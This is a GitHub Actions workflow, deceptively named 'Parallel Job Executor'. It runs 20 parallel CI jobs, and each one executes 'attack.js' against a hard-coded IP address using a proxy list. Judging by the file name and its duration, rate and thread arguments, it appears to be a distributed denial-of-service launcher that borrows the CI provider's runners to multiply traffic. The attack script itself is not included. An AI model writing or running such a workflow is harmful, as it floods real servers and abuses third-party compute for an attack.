name: Parallel Job Executor
on:
  workflow_dispatch:
jobs:
  run-script-in-parallel:
    name: Execute Job Instance #${{ matrix.instance }}
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: '20'
      - run: npm install colors
      - run: node attack.js https://198.16.110.165/ 60 100 32 proxies.txt
